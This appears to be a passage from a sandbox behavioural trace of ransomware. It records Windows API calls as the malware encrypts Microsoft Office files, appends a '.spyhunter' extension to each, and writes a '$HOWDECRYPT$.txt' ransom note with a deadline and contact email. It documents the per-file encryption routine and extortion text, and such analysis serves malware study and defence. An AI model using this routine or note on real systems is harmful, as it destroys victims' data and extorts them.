[0109.722] CloseHandle (hObject=0x178) returned 1 [0109.722] GetProcessHeap () returned 0x2c0000 [0109.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.722] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF.spyhunter") returned 125 [0109.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_on.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_ON.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_on.gif.spyhunter")) returned 1 [0109.723] GetProcessHeap () returned 0x2c0000 [0109.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.723] GetProcessHeap () returned 0x2c0000 [0109.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.723] GetProcessHeap () returned 0x2c0000 [0109.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bd18 | out: hHeap=0x2c0000) returned 1 [0109.723] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb48 | out: pbBuffer=0x248fb48) returned 1 [0109.723] GetProcessHeap () returned 0x2c0000 [0109.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.724] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb40*=0x30) returned 1 [0109.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF") returned 116 [0109.724] StrStrW (lpFirst="TAB_OFF.GIF", lpSrch=".txt") returned 0x0 [0109.724] GetProcessHeap () returned 0x2c0000 [0109.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.724] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb04*=0x16c, lpOverlapped=0x0) returned 1 [0109.725] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe94, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.726] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb04*=0x16c, lpOverlapped=0x0) returned 1 [0109.726] GetProcessHeap () returned 0x2c0000 [0109.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.726] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.726] WriteFile (in: hFile=0x178, lpBuffer=0x248fb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x248fb44*, lpNumberOfBytesWritten=0x248fb04*=0x4, lpOverlapped=0x0) returned 1 [0109.726] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb04*=0x30, lpOverlapped=0x0) returned 1 [0109.726] CloseHandle (hObject=0x178) returned 1 [0109.726] GetProcessHeap () returned 0x2c0000 [0109.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.726] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF.spyhunter") returned 126 [0109.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_off.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\TAB_OFF.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\tab_off.gif.spyhunter")) returned 1 [0109.736] GetProcessHeap () returned 0x2c0000 [0109.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.736] GetProcessHeap () returned 0x2c0000 [0109.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.736] GetProcessHeap () returned 0x2c0000 [0109.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bbe0 | out: hHeap=0x2c0000) returned 1 [0109.736] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb48 | out: pbBuffer=0x248fb48) returned 1 [0109.736] GetProcessHeap () returned 0x2c0000 [0109.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.736] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb40*=0x30) returned 1 [0109.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css") returned 108 [0109.785] StrStrW (lpFirst="Oasis.css", lpSrch=".txt") returned 0x0 [0109.785] GetProcessHeap () returned 0x2c0000 [0109.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.785] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248fb04*=0xfb0, lpOverlapped=0x0) returned 1 [0109.796] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff050, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.796] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248fb04*=0xfb0, lpOverlapped=0x0) returned 1 [0109.796] GetProcessHeap () returned 0x2c0000 [0109.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.796] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.796] WriteFile (in: hFile=0xb4, lpBuffer=0x248fb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x248fb44*, lpNumberOfBytesWritten=0x248fb04*=0x4, lpOverlapped=0x0) returned 1 [0109.796] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb04*=0x30, lpOverlapped=0x0) returned 1 [0109.796] CloseHandle (hObject=0xb4) returned 1 [0109.796] GetProcessHeap () returned 0x2c0000 [0109.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0109.797] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css.spyhunter") returned 118 [0109.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis.css.spyhunter")) returned 1 [0109.797] GetProcessHeap () returned 0x2c0000 [0109.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0109.797] GetProcessHeap () returned 0x2c0000 [0109.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.797] GetProcessHeap () returned 0x2c0000 [0109.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21d10 | out: hHeap=0x2c0000) returned 1 [0109.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb40 | out: pbBuffer=0x248fb40) returned 1 [0109.798] GetProcessHeap () returned 0x2c0000 [0109.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb38*=0x30) returned 1 [0109.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusiconsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.801] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp") returned 121 [0109.801] StrStrW (lpFirst="ProjectStatusIconsMask.bmp", lpSrch=".txt") returned 0x0 [0109.801] GetProcessHeap () returned 0x2c0000 [0109.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.801] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fafc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fafc*=0xa10, lpOverlapped=0x0) returned 1 [0109.829] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff5f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.830] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x248fafc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fafc*=0xa10, lpOverlapped=0x0) returned 1 [0109.830] GetProcessHeap () returned 0x2c0000 [0109.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.830] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.830] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fafc, lpOverlapped=0x0 | out: lpBuffer=0x248fb3c*, lpNumberOfBytesWritten=0x248fafc*=0x4, lpOverlapped=0x0) returned 1 [0109.830] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fafc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fafc*=0x30, lpOverlapped=0x0) returned 1 [0109.830] CloseHandle (hObject=0x16c) returned 1 [0109.830] GetProcessHeap () returned 0x2c0000 [0109.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0109.833] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp.spyhunter") returned 131 [0109.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusiconsmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusiconsmask.bmp.spyhunter")) returned 1 [0109.836] GetProcessHeap () returned 0x2c0000 [0109.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0109.836] GetProcessHeap () returned 0x2c0000 [0109.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.837] GetProcessHeap () returned 0x2c0000 [0109.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e34248 | out: hHeap=0x2c0000) returned 1 [0109.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.838] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0109.838] WriteFile (in: hFile=0x16c, lpBuffer=0x248fa73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x248fa73*, lpNumberOfBytesWritten=0x248fb9c*=0x127, lpOverlapped=0x0) returned 1 [0109.843] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0109.843] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fb9c*=0x2ac, lpOverlapped=0x0) returned 1 [0109.843] CloseHandle (hObject=0x16c) returned 1 [0109.843] GetProcessHeap () returned 0x2c0000 [0109.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c996b0 | out: hHeap=0x2c0000) returned 1 [0109.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb38 | out: pbBuffer=0x248fb38) returned 1 [0109.843] GetProcessHeap () returned 0x2c0000 [0109.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb30*=0x30) returned 1 [0109.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.844] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO") returned 71 [0109.844] StrStrW (lpFirst="WSS.ICO", lpSrch=".txt") returned 0x0 [0109.844] GetProcessHeap () returned 0x2c0000 [0109.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.844] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248faf4*=0x2366, lpOverlapped=0x0) returned 1 [0109.970] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffdc9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.970] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2366, lpNumberOfBytesWritten=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248faf4*=0x2366, lpOverlapped=0x0) returned 1 [0109.971] GetProcessHeap () returned 0x2c0000 [0109.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.971] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.971] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x248fb34*, lpNumberOfBytesWritten=0x248faf4*=0x4, lpOverlapped=0x0) returned 1 [0109.971] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faf4*=0x30, lpOverlapped=0x0) returned 1 [0109.971] CloseHandle (hObject=0x16c) returned 1 [0109.971] GetProcessHeap () returned 0x2c0000 [0109.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0109.971] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO.spyhunter") returned 81 [0109.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS.ICO.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss.ico.spyhunter")) returned 1 [0109.983] GetProcessHeap () returned 0x2c0000 [0109.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0109.983] GetProcessHeap () returned 0x2c0000 [0109.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.984] GetProcessHeap () returned 0x2c0000 [0109.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca23c0 | out: hHeap=0x2c0000) returned 1 [0109.984] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb38 | out: pbBuffer=0x248fb38) returned 1 [0109.984] GetProcessHeap () returned 0x2c0000 [0109.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.984] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb30*=0x30) returned 1 [0109.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMPMAIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\impmail.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.984] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMPMAIL.DLL") returned 58 [0109.984] StrStrW (lpFirst="IMPMAIL.DLL", lpSrch=".txt") returned 0x0 [0109.984] GetProcessHeap () returned 0x2c0000 [0109.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.984] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248faf4*=0x2800, lpOverlapped=0x0) returned 1 [0109.993] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.993] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248faf4*=0x2800, lpOverlapped=0x0) returned 1 [0109.993] GetProcessHeap () returned 0x2c0000 [0109.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.993] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.993] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x248fb34*, lpNumberOfBytesWritten=0x248faf4*=0x4, lpOverlapped=0x0) returned 1 [0110.091] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faf4*=0x30, lpOverlapped=0x0) returned 1 [0110.091] CloseHandle (hObject=0x16c) returned 1 [0110.107] GetProcessHeap () returned 0x2c0000 [0110.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0110.107] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMPMAIL.DLL.spyhunter") returned 68 [0110.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMPMAIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\impmail.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMPMAIL.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\impmail.dll.spyhunter")) returned 1 [0110.822] GetProcessHeap () returned 0x2c0000 [0110.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0110.823] GetProcessHeap () returned 0x2c0000 [0110.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0110.823] GetProcessHeap () returned 0x2c0000 [0110.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331f40 | out: hHeap=0x2c0000) returned 1 [0110.823] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb30 | out: pbBuffer=0x248fb30) returned 1 [0110.823] GetProcessHeap () returned 0x2c0000 [0110.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0110.823] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb28*=0x30) returned 1 [0110.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\MEDCAT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\medcat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 